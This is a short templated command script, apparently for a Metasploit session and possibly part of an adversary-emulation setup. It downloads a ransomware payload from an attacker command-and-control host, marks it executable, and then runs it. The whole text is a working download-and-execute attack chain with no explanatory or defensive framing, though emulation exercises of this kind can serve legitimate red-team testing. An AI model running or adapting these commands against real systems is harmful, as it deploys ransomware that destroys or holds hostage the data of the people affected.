execute -f bash -c -a "-c 'curl http://{{ attacker_cc_metasploit_ip_lanturtle }}:{{ attacker_web_port }}/{{ ransomware_payload }} --output {{ ransomware_path }}/{{ ransomware_payload }} && chmod +x {{ ransomware_path }}/{{ ransomware_payload }}'"
execute -f bash -c -a "-c 'sleep 5'"
execute -f bash -c -a "-c '{{ ransomware_path }}/{{ ransomware_payload }}'"
